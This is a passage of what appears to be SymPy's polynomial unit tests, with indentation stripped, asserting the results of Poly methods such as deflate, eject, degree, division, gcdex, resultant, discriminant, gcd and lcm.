assert f.as_expr({x: 5, y: 6}) == 379
assert f.as_expr(5, 6) == 379
raises(GeneratorsError, lambda: f.as_expr({z: 7}))
def test_Poly_lift():
assert Poly(x**4 - I*x + 17*I, x, gaussian=True).lift() == \
Poly(x**16 + 2*x**10 + 578*x**8 + x**4 - 578*x**2 + 83521,
x, domain='QQ')
def test_Poly_deflate():
assert Poly(0, x).deflate() == ((1,), Poly(0, x))
assert Poly(1, x).deflate() == ((1,), Poly(1, x))
assert Poly(x, x).deflate() == ((1,), Poly(x, x))
assert Poly(x**2, x).deflate() == ((2,), Poly(x, x))
assert Poly(x**17, x).deflate() == ((17,), Poly(x, x))
assert Poly(
x**2*y*z**11 + x**4*z**11).deflate() == ((2, 1, 11), Poly(x*y*z + x**2*z))
def test_Poly_inject():
f = Poly(x**2*y + x*y**3 + x*y + 1, x)
assert f.inject() == Poly(x**2*y + x*y**3 + x*y + 1, x, y)
assert f.inject(front=True) == Poly(y**3*x + y*x**2 + y*x + 1, y, x)
def test_Poly_eject():
f = Poly(x**2*y + x*y**3 + x*y + 1, x, y)
assert f.eject(x) == Poly(x*y**3 + (x**2 + x)*y + 1, y, domain='ZZ[x]')
assert f.eject(y) == Poly(y*x**2 + (y**3 + y)*x + 1, x, domain='ZZ[y]')
ex = x + y + z + t + w
g = Poly(ex, x, y, z, t, w)
assert g.eject(x) == Poly(ex, y, z, t, w, domain='ZZ[x]')
assert g.eject(x, y) == Poly(ex, z, t, w, domain='ZZ[x, y]')
assert g.eject(x, y, z) == Poly(ex, t, w, domain='ZZ[x, y, z]')
assert g.eject(w) == Poly(ex, x, y, z, t, domain='ZZ[w]')
assert g.eject(t, w) == Poly(ex, x, y, z, domain='ZZ[w, t]')
assert g.eject(z, t, w) == Poly(ex, x, y, domain='ZZ[w, t, z]')
raises(DomainError, lambda: Poly(x*y, x, y, domain=ZZ[z]).eject(y))
raises(NotImplementedError, lambda: Poly(x*y, x, y, z).eject(y))
def test_Poly_exclude():
assert Poly(x, x, y).exclude() == Poly(x, x)
assert Poly(x*y, x, y).exclude() == Poly(x*y, x, y)
assert Poly(1, x, y).exclude() == Poly(1, x, y)
def test_Poly__gen_to_level():
assert Poly(1, x, y)._gen_to_level(-2) == 0
assert Poly(1, x, y)._gen_to_level(-1) == 1
assert Poly(1, x, y)._gen_to_level( 0) == 0
assert Poly(1, x, y)._gen_to_level( 1) == 1
raises(PolynomialError, lambda: Poly(1, x, y)._gen_to_level(-3))
raises(PolynomialError, lambda: Poly(1, x, y)._gen_to_level( 2))
assert Poly(1, x, y)._gen_to_level(x) == 0
assert Poly(1, x, y)._gen_to_level(y) == 1
assert Poly(1, x, y)._gen_to_level('x') == 0
assert Poly(1, x, y)._gen_to_level('y') == 1
raises(PolynomialError, lambda: Poly(1, x, y)._gen_to_level(z))
raises(PolynomialError, lambda: Poly(1, x, y)._gen_to_level('z'))
def test_Poly_degree():
assert Poly(0, x).degree() == -oo
assert Poly(1, x).degree() == 0
assert Poly(x, x).degree() == 1
assert Poly(0, x).degree(gen=0) == -oo
assert Poly(1, x).degree(gen=0) == 0
assert Poly(x, x).degree(gen=0) == 1
assert Poly(0, x).degree(gen=x) == -oo
assert Poly(1, x).degree(gen=x) == 0
assert Poly(x, x).degree(gen=x) == 1
assert Poly(0, x).degree(gen='x') == -oo
assert Poly(1, x).degree(gen='x') == 0
assert Poly(x, x).degree(gen='x') == 1
raises(PolynomialError, lambda: Poly(1, x).degree(gen=1))
raises(PolynomialError, lambda: Poly(1, x).degree(gen=y))
raises(PolynomialError, lambda: Poly(1, x).degree(gen='y'))
assert Poly(1, x, y).degree() == 0
assert Poly(2*y, x, y).degree() == 0
assert Poly(x*y, x, y).degree() == 1
assert Poly(1, x, y).degree(gen=x) == 0
assert Poly(2*y, x, y).degree(gen=x) == 0
assert Poly(x*y, x, y).degree(gen=x) == 1
assert Poly(1, x, y).degree(gen=y) == 0
assert Poly(2*y, x, y).degree(gen=y) == 1
assert Poly(x*y, x, y).degree(gen=y) == 1
assert degree(1, x) == 0
assert degree(x, x) == 1
assert degree(x*y**2, gen=x) == 1
assert degree(x*y**2, gen=y) == 2
assert degree(x*y**2, x, y) == 1
assert degree(x*y**2, y, x) == 2
raises(ComputationFailed, lambda: degree(1))
def test_Poly_degree_list():
assert Poly(0, x).degree_list() == (-oo,)
assert Poly(0, x, y).degree_list() == (-oo, -oo)
assert Poly(0, x, y, z).degree_list() == (-oo, -oo, -oo)
assert Poly(1, x).degree_list() == (0,)
assert Poly(1, x, y).degree_list() == (0, 0)
assert Poly(1, x, y, z).degree_list() == (0, 0, 0)
assert Poly(x**2*y + x**3*z**2 + 1).degree_list() == (3, 1, 2)
assert degree_list(1, x) == (0,)
assert degree_list(x, x) == (1,)
assert degree_list(x*y**2) == (1, 2)
raises(ComputationFailed, lambda: degree_list(1))
def test_Poly_total_degree():
assert Poly(x**2*y + x**3*z**2 + 1).total_degree() == 5
assert Poly(x**2 + z**3).total_degree() == 3
assert Poly(x*y*z + z**4).total_degree() == 4
assert Poly(x**3 + x + 1).total_degree() == 3
def test_Poly_homogenize():
assert Poly(x**2+y).homogenize(z) == Poly(x**2+y*z)
assert Poly(x+y).homogenize(z) == Poly(x+y, x, y, z)
assert Poly(x+y**2).homogenize(y) == Poly(x*y+y**2)
def test_Poly_homogeneous_order():
assert Poly(0, x, y).homogeneous_order() == -oo
assert Poly(1, x, y).homogeneous_order() == 0
assert Poly(x, x, y).homogeneous_order() == 1
assert Poly(x*y, x, y).homogeneous_order() == 2
assert Poly(x + 1, x, y).homogeneous_order() is None
assert Poly(x*y + x, x, y).homogeneous_order() is None
assert Poly(x**5 + 2*x**3*y**2 + 9*x*y**4).homogeneous_order() == 5
assert Poly(x**5 + 2*x**3*y**3 + 9*x*y**4).homogeneous_order() is None
def test_Poly_LC():
assert Poly(0, x).LC() == 0
assert Poly(1, x).LC() == 1
assert Poly(2*x**2 + x, x).LC() == 2
assert Poly(x*y**7 + 2*x**2*y**3).LC('lex') == 2
assert Poly(x*y**7 + 2*x**2*y**3).LC('grlex') == 1
assert LC(x*y**7 + 2*x**2*y**3, order='lex') == 2
assert LC(x*y**7 + 2*x**2*y**3, order='grlex') == 1
def test_Poly_TC():
assert Poly(0, x).TC() == 0
assert Poly(1, x).TC() == 1
assert Poly(2*x**2 + x, x).TC() == 0
def test_Poly_EC():
assert Poly(0, x).EC() == 0
assert Poly(1, x).EC() == 1
assert Poly(2*x**2 + x, x).EC() == 1
assert Poly(x*y**7 + 2*x**2*y**3).EC('lex') == 1
assert Poly(x*y**7 + 2*x**2*y**3).EC('grlex') == 2
def test_Poly_coeff():
assert Poly(0, x).coeff_monomial(1) == 0
assert Poly(0, x).coeff_monomial(x) == 0
assert Poly(1, x).coeff_monomial(1) == 1
assert Poly(1, x).coeff_monomial(x) == 0
assert Poly(x**8, x).coeff_monomial(1) == 0
assert Poly(x**8, x).coeff_monomial(x**7) == 0
assert Poly(x**8, x).coeff_monomial(x**8) == 1
assert Poly(x**8, x).coeff_monomial(x**9) == 0
assert Poly(3*x*y**2 + 1, x, y).coeff_monomial(1) == 1
assert Poly(3*x*y**2 + 1, x, y).coeff_monomial(x*y**2) == 3
p = Poly(24*x*y*exp(8) + 23*x, x, y)
assert p.coeff_monomial(x) == 23
assert p.coeff_monomial(y) == 0
assert p.coeff_monomial(x*y) == 24*exp(8)
assert p.as_expr().coeff(x) == 24*y*exp(8) + 23
raises(NotImplementedError, lambda: p.coeff(x))
raises(ValueError, lambda: Poly(x + 1).coeff_monomial(0))
raises(ValueError, lambda: Poly(x + 1).coeff_monomial(3*x))
raises(ValueError, lambda: Poly(x + 1).coeff_monomial(3*x*y))
def test_Poly_nth():
assert Poly(0, x).nth(0) == 0
assert Poly(0, x).nth(1) == 0
assert Poly(1, x).nth(0) == 1
assert Poly(1, x).nth(1) == 0
assert Poly(x**8, x).nth(0) == 0
assert Poly(x**8, x).nth(7) == 0
assert Poly(x**8, x).nth(8) == 1
assert Poly(x**8, x).nth(9) == 0
assert Poly(3*x*y**2 + 1, x, y).nth(0, 0) == 1
assert Poly(3*x*y**2 + 1, x, y).nth(1, 2) == 3
raises(ValueError, lambda: Poly(x*y + 1, x, y).nth(1))
def test_Poly_LM():
assert Poly(0, x).LM() == (0,)
assert Poly(1, x).LM() == (0,)
assert Poly(2*x**2 + x, x).LM() == (2,)
assert Poly(x*y**7 + 2*x**2*y**3).LM('lex') == (2, 3)
assert Poly(x*y**7 + 2*x**2*y**3).LM('grlex') == (1, 7)
assert LM(x*y**7 + 2*x**2*y**3, order='lex') == x**2*y**3
assert LM(x*y**7 + 2*x**2*y**3, order='grlex') == x*y**7
def test_Poly_LM_custom_order():
f = Poly(x**2*y**3*z + x**2*y*z**3 + x*y*z + 1)
rev_lex = lambda monom: tuple(reversed(monom))
assert f.LM(order='lex') == (2, 3, 1)
assert f.LM(order=rev_lex) == (2, 1, 3)
def test_Poly_EM():
assert Poly(0, x).EM() == (0,)
assert Poly(1, x).EM() == (0,)
assert Poly(2*x**2 + x, x).EM() == (1,)
assert Poly(x*y**7 + 2*x**2*y**3).EM('lex') == (1, 7)
assert Poly(x*y**7 + 2*x**2*y**3).EM('grlex') == (2, 3)
def test_Poly_LT():
assert Poly(0, x).LT() == ((0,), 0)
assert Poly(1, x).LT() == ((0,), 1)
assert Poly(2*x**2 + x, x).LT() == ((2,), 2)
assert Poly(x*y**7 + 2*x**2*y**3).LT('lex') == ((2, 3), 2)
assert Poly(x*y**7 + 2*x**2*y**3).LT('grlex') == ((1, 7), 1)
assert LT(x*y**7 + 2*x**2*y**3, order='lex') == 2*x**2*y**3
assert LT(x*y**7 + 2*x**2*y**3, order='grlex') == x*y**7
def test_Poly_ET():
assert Poly(0, x).ET() == ((0,), 0)
assert Poly(1, x).ET() == ((0,), 1)
assert Poly(2*x**2 + x, x).ET() == ((1,), 1)
assert Poly(x*y**7 + 2*x**2*y**3).ET('lex') == ((1, 7), 1)
assert Poly(x*y**7 + 2*x**2*y**3).ET('grlex') == ((2, 3), 2)
def test_Poly_max_norm():
assert Poly(-1, x).max_norm() == 1
assert Poly( 0, x).max_norm() == 0
assert Poly( 1, x).max_norm() == 1
def test_Poly_l1_norm():
assert Poly(-1, x).l1_norm() == 1
assert Poly( 0, x).l1_norm() == 0
assert Poly( 1, x).l1_norm() == 1
def test_Poly_clear_denoms():
coeff, poly = Poly(x + 2, x).clear_denoms()
assert coeff == 1 and poly == Poly(
x + 2, x, domain='ZZ') and poly.get_domain() == ZZ
coeff, poly = Poly(x/2 + 1, x).clear_denoms()
assert coeff == 2 and poly == Poly(
x + 2, x, domain='QQ') and poly.get_domain() == QQ
coeff, poly = Poly(x/2 + 1, x).clear_denoms(convert=True)
assert coeff == 2 and poly == Poly(
x + 2, x, domain='ZZ') and poly.get_domain() == ZZ
coeff, poly = Poly(x/y + 1, x).clear_denoms(convert=True)
assert coeff == y and poly == Poly(
x + y, x, domain='ZZ[y]') and poly.get_domain() == ZZ[y]
coeff, poly = Poly(x/3 + sqrt(2), x, domain='EX').clear_denoms()
assert coeff == 3 and poly == Poly(
x + 3*sqrt(2), x, domain='EX') and poly.get_domain() == EX
coeff, poly = Poly(
x/3 + sqrt(2), x, domain='EX').clear_denoms(convert=True)
assert coeff == 3 and poly == Poly(
x + 3*sqrt(2), x, domain='EX') and poly.get_domain() == EX
def test_Poly_rat_clear_denoms():
f = Poly(x**2/y + 1, x)
g = Poly(x**3 + y, x)
assert f.rat_clear_denoms(g) == \
(Poly(x**2 + y, x), Poly(y*x**3 + y**2, x))
f = f.set_domain(EX)
g = g.set_domain(EX)
assert f.rat_clear_denoms(g) == (f, g)
def test_Poly_integrate():
assert Poly(x + 1).integrate() == Poly(x**2/2 + x)
assert Poly(x + 1).integrate(x) == Poly(x**2/2 + x)
assert Poly(x + 1).integrate((x, 1)) == Poly(x**2/2 + x)
assert Poly(x*y + 1).integrate(x) == Poly(x**2*y/2 + x)
assert Poly(x*y + 1).integrate(y) == Poly(x*y**2/2 + y)
assert Poly(x*y + 1).integrate(x, x) == Poly(x**3*y/6 + x**2/2)
assert Poly(x*y + 1).integrate(y, y) == Poly(x*y**3/6 + y**2/2)
assert Poly(x*y + 1).integrate((x, 2)) == Poly(x**3*y/6 + x**2/2)
assert Poly(x*y + 1).integrate((y, 2)) == Poly(x*y**3/6 + y**2/2)
assert Poly(x*y + 1).integrate(x, y) == Poly(x**2*y**2/4 + x*y)
assert Poly(x*y + 1).integrate(y, x) == Poly(x**2*y**2/4 + x*y)
def test_Poly_diff():
assert Poly(x**2 + x).diff() == Poly(2*x + 1)
assert Poly(x**2 + x).diff(x) == Poly(2*x + 1)
assert Poly(x**2 + x).diff((x, 1)) == Poly(2*x + 1)
assert Poly(x**2*y**2 + x*y).diff(x) == Poly(2*x*y**2 + y)
assert Poly(x**2*y**2 + x*y).diff(y) == Poly(2*x**2*y + x)
assert Poly(x**2*y**2 + x*y).diff(x, x) == Poly(2*y**2, x, y)
assert Poly(x**2*y**2 + x*y).diff(y, y) == Poly(2*x**2, x, y)
assert Poly(x**2*y**2 + x*y).diff((x, 2)) == Poly(2*y**2, x, y)
assert Poly(x**2*y**2 + x*y).diff((y, 2)) == Poly(2*x**2, x, y)
assert Poly(x**2*y**2 + x*y).diff(x, y) == Poly(4*x*y + 1)
assert Poly(x**2*y**2 + x*y).diff(y, x) == Poly(4*x*y + 1)
def test_Poly_eval():
assert Poly(0, x).eval(7) == 0
assert Poly(1, x).eval(7) == 1
assert Poly(x, x).eval(7) == 7
assert Poly(0, x).eval(0, 7) == 0
assert Poly(1, x).eval(0, 7) == 1
assert Poly(x, x).eval(0, 7) == 7
assert Poly(0, x).eval(x, 7) == 0
assert Poly(1, x).eval(x, 7) == 1
assert Poly(x, x).eval(x, 7) == 7
assert Poly(0, x).eval('x', 7) == 0
assert Poly(1, x).eval('x', 7) == 1
assert Poly(x, x).eval('x', 7) == 7
raises(PolynomialError, lambda: Poly(1, x).eval(1, 7))
raises(PolynomialError, lambda: Poly(1, x).eval(y, 7))
raises(PolynomialError, lambda: Poly(1, x).eval('y', 7))
assert Poly(123, x, y).eval(7) == Poly(123, y)
assert Poly(2*y, x, y).eval(7) == Poly(2*y, y)
assert Poly(x*y, x, y).eval(7) == Poly(7*y, y)
assert Poly(123, x, y).eval(x, 7) == Poly(123, y)
assert Poly(2*y, x, y).eval(x, 7) == Poly(2*y, y)
assert Poly(x*y, x, y).eval(x, 7) == Poly(7*y, y)
assert Poly(123, x, y).eval(y, 7) == Poly(123, x)
assert Poly(2*y, x, y).eval(y, 7) == Poly(14, x)
assert Poly(x*y, x, y).eval(y, 7) == Poly(7*x, x)
assert Poly(x*y + y, x, y).eval({x: 7}) == Poly(8*y, y)
assert Poly(x*y + y, x, y).eval({y: 7}) == Poly(7*x + 7, x)
assert Poly(x*y + y, x, y).eval({x: 6, y: 7}) == 49
assert Poly(x*y + y, x, y).eval({x: 7, y: 6}) == 48
assert Poly(x*y + y, x, y).eval((6, 7)) == 49
assert Poly(x*y + y, x, y).eval([6, 7]) == 49
assert Poly(x + 1, domain='ZZ').eval(S(1)/2) == S(3)/2
assert Poly(x + 1, domain='ZZ').eval(sqrt(2)) == sqrt(2) + 1
raises(ValueError, lambda: Poly(x*y + y, x, y).eval((6, 7, 8)))
raises(DomainError, lambda: Poly(x + 1, domain='ZZ').eval(S(1)/2, auto=False))
# issue 6344
alpha = Symbol('alpha')
result = (2*alpha*z - 2*alpha + z**2 + 3)/(z**2 - 2*z + 1)
f = Poly(x**2 + (alpha - 1)*x - alpha + 1, x, domain='ZZ[alpha]')
assert f.eval((z + 1)/(z - 1)) == result
g = Poly(x**2 + (alpha - 1)*x - alpha + 1, x, y, domain='ZZ[alpha]')
assert g.eval((z + 1)/(z - 1)) == Poly(result, y, domain='ZZ(alpha,z)')
def test_Poly___call__():
f = Poly(2*x*y + 3*x + y + 2*z)
assert f(2) == Poly(5*y + 2*z + 6)
assert f(2, 5) == Poly(2*z + 31)
assert f(2, 5, 7) == 45
def test_parallel_poly_from_expr():
assert parallel_poly_from_expr(
[x - 1, x**2 - 1], x)[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[Poly(x - 1, x), x**2 - 1], x)[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[x - 1, Poly(x**2 - 1, x)], x)[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr([Poly(
x - 1, x), Poly(x**2 - 1, x)], x)[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[x - 1, x**2 - 1], x, y)[0] == [Poly(x - 1, x, y), Poly(x**2 - 1, x, y)]
assert parallel_poly_from_expr([Poly(
x - 1, x), x**2 - 1], x, y)[0] == [Poly(x - 1, x, y), Poly(x**2 - 1, x, y)]
assert parallel_poly_from_expr([x - 1, Poly(
x**2 - 1, x)], x, y)[0] == [Poly(x - 1, x, y), Poly(x**2 - 1, x, y)]
assert parallel_poly_from_expr([Poly(x - 1, x), Poly(
x**2 - 1, x)], x, y)[0] == [Poly(x - 1, x, y), Poly(x**2 - 1, x, y)]
assert parallel_poly_from_expr(
[x - 1, x**2 - 1])[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[Poly(x - 1, x), x**2 - 1])[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[x - 1, Poly(x**2 - 1, x)])[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[Poly(x - 1, x), Poly(x**2 - 1, x)])[0] == [Poly(x - 1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[1, x**2 - 1])[0] == [Poly(1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[1, x**2 - 1])[0] == [Poly(1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[1, Poly(x**2 - 1, x)])[0] == [Poly(1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[1, Poly(x**2 - 1, x)])[0] == [Poly(1, x), Poly(x**2 - 1, x)]
assert parallel_poly_from_expr(
[x**2 - 1, 1])[0] == [Poly(x**2 - 1, x), Poly(1, x)]
assert parallel_poly_from_expr(
[x**2 - 1, 1])[0] == [Poly(x**2 - 1, x), Poly(1, x)]
assert parallel_poly_from_expr(
[Poly(x**2 - 1, x), 1])[0] == [Poly(x**2 - 1, x), Poly(1, x)]
assert parallel_poly_from_expr(
[Poly(x**2 - 1, x), 1])[0] == [Poly(x**2 - 1, x), Poly(1, x)]
assert parallel_poly_from_expr([Poly(x, x, y), Poly(y, x, y)], x, y, order='lex')[0] == \
[Poly(x, x, y, domain='ZZ'), Poly(y, x, y, domain='ZZ')]
raises(PolificationFailed, lambda: parallel_poly_from_expr([0, 1]))
def test_pdiv():
f, g = x**2 - y**2, x - y
q, r = x + y, 0
F, G, Q, R = [ Poly(h, x, y) for h in (f, g, q, r) ]
assert F.pdiv(G) == (Q, R)
assert F.prem(G) == R
assert F.pquo(G) == Q
assert F.pexquo(G) == Q
assert pdiv(f, g) == (q, r)
assert prem(f, g) == r
assert pquo(f, g) == q
assert pexquo(f, g) == q
assert pdiv(f, g, x, y) == (q, r)
assert prem(f, g, x, y) == r
assert pquo(f, g, x, y) == q
assert pexquo(f, g, x, y) == q
assert pdiv(f, g, (x, y)) == (q, r)
assert prem(f, g, (x, y)) == r
assert pquo(f, g, (x, y)) == q
assert pexquo(f, g, (x, y)) == q
assert pdiv(F, G) == (Q, R)
assert prem(F, G) == R
assert pquo(F, G) == Q
assert pexquo(F, G) == Q
assert pdiv(f, g, polys=True) == (Q, R)
assert prem(f, g, polys=True) == R
assert pquo(f, g, polys=True) == Q
assert pexquo(f, g, polys=True) == Q
assert pdiv(F, G, polys=False) == (q, r)
assert prem(F, G, polys=False) == r
assert pquo(F, G, polys=False) == q
assert pexquo(F, G, polys=False) == q
raises(ComputationFailed, lambda: pdiv(4, 2))
raises(ComputationFailed, lambda: prem(4, 2))
raises(ComputationFailed, lambda: pquo(4, 2))
raises(ComputationFailed, lambda: pexquo(4, 2))
def test_div():
f, g = x**2 - y**2, x - y
q, r = x + y, 0
F, G, Q, R = [ Poly(h, x, y) for h in (f, g, q, r) ]
assert F.div(G) == (Q, R)
assert F.rem(G) == R
assert F.quo(G) == Q
assert F.exquo(G) == Q
assert div(f, g) == (q, r)
assert rem(f, g) == r
assert quo(f, g) == q
assert exquo(f, g) == q
assert div(f, g, x, y) == (q, r)
assert rem(f, g, x, y) == r
assert quo(f, g, x, y) == q
assert exquo(f, g, x, y) == q
assert div(f, g, (x, y)) == (q, r)
assert rem(f, g, (x, y)) == r
assert quo(f, g, (x, y)) == q
assert exquo(f, g, (x, y)) == q
assert div(F, G) == (Q, R)
assert rem(F, G) == R
assert quo(F, G) == Q
assert exquo(F, G) == Q
assert div(f, g, polys=True) == (Q, R)
assert rem(f, g, polys=True) == R
assert quo(f, g, polys=True) == Q
assert exquo(f, g, polys=True) == Q
assert div(F, G, polys=False) == (q, r)
assert rem(F, G, polys=False) == r
assert quo(F, G, polys=False) == q
assert exquo(F, G, polys=False) == q
raises(ComputationFailed, lambda: div(4, 2))
raises(ComputationFailed, lambda: rem(4, 2))
raises(ComputationFailed, lambda: quo(4, 2))
raises(ComputationFailed, lambda: exquo(4, 2))
f, g = x**2 + 1, 2*x - 4
qz, rz = 0, x**2 + 1
qq, rq = x/2 + 1, 5
assert div(f, g) == (qq, rq)
assert div(f, g, auto=True) == (qq, rq)
assert div(f, g, auto=False) == (qz, rz)
assert div(f, g, domain=ZZ) == (qz, rz)
assert div(f, g, domain=QQ) == (qq, rq)
assert div(f, g, domain=ZZ, auto=True) == (qq, rq)
assert div(f, g, domain=ZZ, auto=False) == (qz, rz)
assert div(f, g, domain=QQ, auto=True) == (qq, rq)
assert div(f, g, domain=QQ, auto=False) == (qq, rq)
assert rem(f, g) == rq
assert rem(f, g, auto=True) == rq
assert rem(f, g, auto=False) == rz
assert rem(f, g, domain=ZZ) == rz
assert rem(f, g, domain=QQ) == rq
assert rem(f, g, domain=ZZ, auto=True) == rq
assert rem(f, g, domain=ZZ, auto=False) == rz
assert rem(f, g, domain=QQ, auto=True) == rq
assert rem(f, g, domain=QQ, auto=False) == rq
assert quo(f, g) == qq
assert quo(f, g, auto=True) == qq
assert quo(f, g, auto=False) == qz
assert quo(f, g, domain=ZZ) == qz
assert quo(f, g, domain=QQ) == qq
assert quo(f, g, domain=ZZ, auto=True) == qq
assert quo(f, g, domain=ZZ, auto=False) == qz
assert quo(f, g, domain=QQ, auto=True) == qq
assert quo(f, g, domain=QQ, auto=False) == qq
f, g, q = x**2, 2*x, x/2
assert exquo(f, g) == q
assert exquo(f, g, auto=True) == q
raises(ExactQuotientFailed, lambda: exquo(f, g, auto=False))
raises(ExactQuotientFailed, lambda: exquo(f, g, domain=ZZ))
assert exquo(f, g, domain=QQ) == q
assert exquo(f, g, domain=ZZ, auto=True) == q
raises(ExactQuotientFailed, lambda: exquo(f, g, domain=ZZ, auto=False))
assert exquo(f, g, domain=QQ, auto=True) == q
assert exquo(f, g, domain=QQ, auto=False) == q
f, g = Poly(x**2), Poly(x)
q, r = f.div(g)
assert q.get_domain().is_ZZ and r.get_domain().is_ZZ
r = f.rem(g)
assert r.get_domain().is_ZZ
q = f.quo(g)
assert q.get_domain().is_ZZ
q = f.exquo(g)
assert q.get_domain().is_ZZ
def test_gcdex():
f, g = 2*x, x**2 - 16
s, t, h = x/32, -Rational(1, 16), 1
F, G, S, T, H = [ Poly(u, x, domain='QQ') for u in (f, g, s, t, h) ]
assert F.half_gcdex(G) == (S, H)
assert F.gcdex(G) == (S, T, H)
assert F.invert(G) == S
assert half_gcdex(f, g) == (s, h)
assert gcdex(f, g) == (s, t, h)
assert invert(f, g) == s
assert half_gcdex(f, g, x) == (s, h)
assert gcdex(f, g, x) == (s, t, h)
assert invert(f, g, x) == s
assert half_gcdex(f, g, (x,)) == (s, h)
assert gcdex(f, g, (x,)) == (s, t, h)
assert invert(f, g, (x,)) == s
assert half_gcdex(F, G) == (S, H)
assert gcdex(F, G) == (S, T, H)
assert invert(F, G) == S
assert half_gcdex(f, g, polys=True) == (S, H)
assert gcdex(f, g, polys=True) == (S, T, H)
assert invert(f, g, polys=True) == S
assert half_gcdex(F, G, polys=False) == (s, h)
assert gcdex(F, G, polys=False) == (s, t, h)
assert invert(F, G, polys=False) == s
assert half_gcdex(100, 2004) == (-20, 4)
assert gcdex(100, 2004) == (-20, 1, 4)
assert invert(3, 7) == 5
raises(DomainError, lambda: half_gcdex(x + 1, 2*x + 1, auto=False))
raises(DomainError, lambda: gcdex(x + 1, 2*x + 1, auto=False))
raises(DomainError, lambda: invert(x + 1, 2*x + 1, auto=False))
def test_revert():
f = Poly(1 - x**2/2 + x**4/24 - x**6/720)
g = Poly(61*x**6/720 + 5*x**4/24 + x**2/2 + 1)
assert f.revert(8) == g
def test_subresultants():
f, g, h = x**2 - 2*x + 1, x**2 - 1, 2*x - 2
F, G, H = Poly(f), Poly(g), Poly(h)
assert F.subresultants(G) == [F, G, H]
assert subresultants(f, g) == [f, g, h]
assert subresultants(f, g, x) == [f, g, h]
assert subresultants(f, g, (x,)) == [f, g, h]
assert subresultants(F, G) == [F, G, H]
assert subresultants(f, g, polys=True) == [F, G, H]
assert subresultants(F, G, polys=False) == [f, g, h]
raises(ComputationFailed, lambda: subresultants(4, 2))
def test_resultant():
f, g, h = x**2 - 2*x + 1, x**2 - 1, 0
F, G = Poly(f), Poly(g)
assert F.resultant(G) == h
assert resultant(f, g) == h
assert resultant(f, g, x) == h
assert resultant(f, g, (x,)) == h
assert resultant(F, G) == h
assert resultant(f, g, polys=True) == h
assert resultant(F, G, polys=False) == h
assert resultant(f, g, includePRS=True) == (h, [f, g, 2*x - 2])
f, g, h = x - a, x - b, a - b
F, G, H = Poly(f), Poly(g), Poly(h)
assert F.resultant(G) == H
assert resultant(f, g) == h
assert resultant(f, g, x) == h
assert resultant(f, g, (x,)) == h
assert resultant(F, G) == H
assert resultant(f, g, polys=True) == H
assert resultant(F, G, polys=False) == h
raises(ComputationFailed, lambda: resultant(4, 2))
def test_discriminant():
f, g = x**3 + 3*x**2 + 9*x - 13, -11664
F = Poly(f)
assert F.discriminant() == g
assert discriminant(f) == g
assert discriminant(f, x) == g
assert discriminant(f, (x,)) == g
assert discriminant(F) == g
assert discriminant(f, polys=True) == g
assert discriminant(F, polys=False) == g
f, g = a*x**2 + b*x + c, b**2 - 4*a*c
F, G = Poly(f), Poly(g)
assert F.discriminant() == G
assert discriminant(f) == g
assert discriminant(f, x, a, b, c) == g
assert discriminant(f, (x, a, b, c)) == g
assert discriminant(F) == G
assert discriminant(f, polys=True) == G
assert discriminant(F, polys=False) == g
raises(ComputationFailed, lambda: discriminant(4))
def test_dispersion():
# We test only the API here. For more mathematical
# tests see the dedicated test file.
fp = poly((x + 1)*(x + 2), x)
assert sorted(fp.dispersionset()) == [0, 1]
assert fp.dispersion() == 1
fp = poly(x**4 - 3*x**2 + 1, x)
gp = fp.shift(-3)
assert sorted(fp.dispersionset(gp)) == [2, 3, 4]
assert fp.dispersion(gp) == 4
def test_gcd_list():
F = [x**3 - 1, x**2 - 1, x**2 - 3*x + 2]
assert gcd_list(F) == x - 1
assert gcd_list(F, polys=True) == Poly(x - 1)
assert gcd_list([]) == 0
assert gcd_list([1, 2]) == 1
assert gcd_list([4, 6, 8]) == 2
assert gcd_list([x*(y + 42) - x*y - x*42]) == 0
gcd = gcd_list([], x)
assert gcd.is_Number and gcd is S.Zero
gcd = gcd_list([], x, polys=True)
assert gcd.is_Poly and gcd.is_zero
raises(ComputationFailed, lambda: gcd_list([], polys=True))
def test_lcm_list():
F = [x**3 - 1, x**2 - 1, x**2 - 3*x + 2]
assert lcm_list(F) == x**5 - x**4 - 2*x**3 - x**2 + x + 2
assert lcm_list(F, polys=True) == Poly(x**5 - x**4 - 2*x**3 - x**2 + x + 2)
assert lcm_list([]) == 1
assert lcm_list([1, 2]) == 2
assert lcm_list([4, 6, 8]) == 24
assert lcm_list([x*(y + 42) - x*y - x*42]) == 0
lcm = lcm_list([], x)
assert lcm.is_Number and lcm is S.One
lcm = lcm_list([], x, polys=True)
assert lcm.is_Poly and lcm.is_one
raises(ComputationFailed, lambda: lcm_list([], polys=True))
def test_gcd():
f, g = x**3 - 1, x**2 - 1
s, t = x**2 + x + 1, x + 1
h, r = x - 1, x**4 + x**3 - x - 1
F, G, S, T, H, R = [ Poly(u) for u in (f, g, s, t, h, r) ]
assert F.cofactors(G) == (H, S, T)
assert F.gcd(G) == H
assert F.lcm(G) == R
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == r
assert cofactors(f, g, x) == (h, s, t)
assert gcd(f, g, x) == h
assert lcm(f, g, x) == r
assert cofactors(f, g, (x,)) == (h, s, t)
assert gcd(f, g, (x,)) == h
assert lcm(f, g, (x,)) == r
assert cofactors(F, G) == (H, S, T)
assert gcd(F, G) == H
assert lcm(F, G) == R
assert cofactors(f, g, polys=True) == (H, S, T)
assert gcd(f, g, polys=True) == H
assert lcm(f, g, polys=True) == R
assert cofactors(F, G, polys=False) == (h, s, t)
assert gcd(F, G, polys=False) == h
assert lcm(F, G, polys=False) == r
f, g = 1.0*x**2 - 1.0, 1.0*x - 1.0
h, s, t = g, 1.0*x + 1.0, 1.0
assert cofactors(f, g) == (h, s, t)
assert gcd(f, g) == h
assert lcm(f, g) == f
f, g = 1.0*x**2 - 1.0, 1.0*x - 1.0
